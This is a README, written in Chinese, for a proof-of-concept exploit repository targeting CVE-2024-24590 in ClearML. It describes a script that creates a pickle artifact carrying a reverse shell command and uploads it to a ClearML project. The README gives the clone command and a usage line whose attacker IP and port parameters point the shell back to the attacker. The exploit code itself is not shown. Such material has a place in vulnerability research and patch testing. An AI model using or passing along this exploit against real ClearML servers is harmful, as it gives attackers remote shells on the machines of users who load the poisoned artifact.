_____ _ __ __ _ _____ ____ _____
/ ____| | | \/ | | | __ \ / __ \ / ____|
| | | | ___ __ _ _ __| \ / | | | |__) | | | | |
| | | |/ _ \/ _` | '__| |\/| | | | ___/| | | | |
| |____| | __/ (_| | | | | | | |____ | | | |__| | |____
\_____|_|\___|\__,_|_| |_| |_|______| |_| \____/ \_____| - 2024-24590 x OxyDe
本项目演示如何通过命令行参数动态上传 pickle 工件到 ClearML,并支持配置参数。该脚本初始化一个 ClearML 任务,动态配置反向 shell 执行的命令,并将其作为工件上传。(PoC-CVE-2024-24590)
clearml 包argparse 包pickle 包os 模块安装 ClearML 包:
pip install clearml
克隆仓库:
git clone https://github.com/OxyDeV2/PoC-CVE-2024-24590.git
cd PoC-CVE-2024-24590
运行脚本时,请使用以下命令并传入相应的参数:
python script.py --project_name "<project_name>" --task_name "<task_name>" --tags <tag1> <tag2> ... --artifact_name "<artifact_name>" --ip "<ip_address>" --port "<port>"
感谢 Skriix :)